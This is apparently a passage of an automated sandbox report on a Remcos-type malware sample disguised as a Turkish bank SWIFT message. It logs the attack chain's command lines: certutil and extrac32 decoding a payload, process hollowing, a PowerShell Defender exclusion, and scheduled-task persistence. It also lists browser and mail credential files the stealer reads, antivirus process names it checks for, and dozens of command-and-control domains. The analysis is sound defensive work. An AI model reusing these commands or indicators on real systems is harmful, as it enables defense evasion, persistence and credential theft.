                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1528FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF7D1528FA4
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1528FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7D1528FA4
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15293B0 SetUnhandledExceptionFilter,8_2_00007FF7D15293B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14553E0 SetUnhandledExceptionFilter,9_2_00007FF7F14553E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1454E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF7F1454E18
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
                    Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
                    Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
                    Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 22B008
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 296008
                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F1407024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,9_2_00007FF7F1407024
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                    Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                    Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
                    Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:06 /du 23:59 /sc daily /ri 1 /f
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: unknown unknown
                    Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: unknown unknown
                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F14372B0 CAFindByName,#359,LocalAlloc,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,GetSecurityDescriptorLength,LocalAlloc,MakeSelfRelativeSD,GetLastError,CASetCASecurity,CAUpdateCAEx,#357,LocalFree,LocalFree,LocalFree,CACloseCA,9_2_00007FF7F14372B0
                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F13F4E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13F4E88
                    Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF7D15251EC
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF7D1516EE4
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF7D1523140
                    Source: C:\Users\Public\alpha.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,8_2_00007FF7D15251EC
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,8_2_00007FF7D1516EE4
                    Source: C:\Users\Public\alpha.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,8_2_00007FF7D1523140
                    Source: C:\Users\Public\kn.exe Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,9_2_00007FF7F1453800
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,15_2_02EA5ACC
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: GetLocaleInfoA,15_2_02EAA7C4
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,15_2_02EA5BD8
                    Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: GetLocaleInfoA,15_2_02EAA810
                    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\Libraries\aymtmquJ.pif Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\System32\AppVClient.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D1538654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF7D1538654
                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F143130C GetUserNameExW,GetLastError,LocalAlloc,#357,LocalFree,9_2_00007FF7F143130C
                    Source: C:\Users\Public\alpha.exe Code function: 4_2_00007FF7D151586C GetVersion,4_2_00007FF7D151586C
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
                    Source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match File source: 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000002F.00000002.2051386089.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Native_neworigin.exe PID: 2724, type: MEMORYSTR

                    Remote Access Functionality

                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F13654A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,9_2_00007FF7F13654A0
                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F1385648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,9_2_00007FF7F1385648
                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F136227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,9_2_00007FF7F136227C
                    Source: C:\Users\Public\kn.exe Code function: 9_2_00007FF7F137E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,9_2_00007FF7F137E568
                    ATT&CK matrix (columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact)
                    Behavior Graph (ID: 1557464, Sample: Ziraat_Bankasi_Swift_Mesaji..., Startdate: 18/11/2024, Architecture: WINDOWS, Score: 100)

                    Source | Detection | Scanner | Label | Link
                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | 13% | ReversingLabs | Script-BAT.Trojan.Remcos |
                    No Antivirus matches
                                              18.208.156.248
                                              truefalse
                                                high
                                                przvgke.biz
                                                172.234.222.138
                                                truefalse
                                                  high
                                                  ocsvqjg.biz
                                                  3.254.94.185
                                                  truefalse
                                                    high
                                                    ecxbwt.biz
                                                    54.244.188.177
                                                    truefalse
                                                      high
                                                      bghjpy.biz
                                                      34.211.97.45
                                                      truefalse
                                                        high
                                                        damcprvgv.biz
                                                        18.208.156.248
                                                        truefalse
                                                          high
                                                          gnqgo.biz
                                                          18.208.156.248
                                                          truefalse
                                                            high
                                                            tltxn.biz
                                                            18.208.156.248
                                                            truefalse
                                                              high
                                                              deoci.biz
                                                              18.208.156.248
                                                              truefalse
                                                                high
                                                                krnsmlmvd.biz
                                                                47.129.31.212
                                                                truefalse
                                                                  high
                                                                  uevrpr.biz
                                                                  18.246.231.120
                                                                  truefalse
                                                                    high
                                                                    hagujcj.biz
                                                                    18.208.156.248
                                                                    truefalse
                                                                      high
                                                                      gxe0.com
                                                                      198.252.105.91
                                                                      truefalse
                                                                        high
                                                                        bumxkqgxu.biz
                                                                        44.221.84.105
                                                                        truefalse
                                                                          high
                                                                          yhqqc.biz
                                                                          34.211.97.45
                                                                          truefalse
                                                                            high
                                                                            ltpqsnu.biz
                                                                            18.208.156.248
                                                                            truefalse
                                                                              high
                                                                              api.ipify.org
                                                                              104.26.13.205
                                                                              truefalse
                                                                                high
                                                                                sctmku.biz
                                                                                35.164.78.200
                                                                                truefalse
                                                                                  high
                                                                                  gcedd.biz
                                                                                  13.251.16.150
                                                                                  truefalse
                                                                                    high
                                                                                    wxgzshna.biz
                                                                                    72.52.178.23
                                                                                    truefalse
                                                                                      high
                                                                                      oshhkdluh.biz
                                                                                      54.244.188.177
                                                                                      truefalse
                                                                                        high
                                                                                        opowhhece.biz
                                                                                        18.208.156.248
                                                                                        truefalse
                                                                                          high
                                                                                          pectx.biz
                                                                                          18.246.231.120
                                                                                          truefalse
                                                                                            high
                                                                                            jwkoeoqns.biz
                                                                                            18.208.156.248
                                                                                            truefalse
                                                                                              high
                                                                                              jpskm.biz
                                                                                              34.211.97.45
                                                                                              truefalse
                                                                                                high
                                                                                                cjvgcl.biz
                                                                                                18.208.156.248
                                                                                                truefalse
                                                                                                  high
                                                                                                  ifsaia.biz
                                                                                                  13.251.16.150
                                                                                                  truefalse
                                                                                                    high
                                                                                                    rynmcq.biz
                                                                                                    54.244.188.177
                                                                                                    truefalse
                                                                                                      high
                                                                                                      fjumtfnz.biz
                                                                                                      34.211.97.45
                                                                                                      truefalse
                                                                                                        high
                                                                                                        dyjdrp.biz
                                                                                                        54.244.188.177
                                                                                                        truefalse
                                                                                                          high
                                                                                                          ypituyqsq.biz
                                                                                                          3.94.10.34
                                                                                                          truefalse
                                                                                                            high
                                                                                                            tnevuluw.biz
                                                                                                            35.164.78.200
                                                                                                            truefalse
                                                                                                              high
                                                                                                              znwbniskf.biz
                                                                                                              47.129.31.212
                                                                                                              truefalse
                                                                                                                high
                                                                                                                ijnmvqa.biz
                                                                                                                35.164.78.200
                                                                                                                truefalse
                                                                                                                  high
                                                                                                                  saytjshyf.biz
                                                                                                                  44.221.84.105
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    rrqafepng.biz
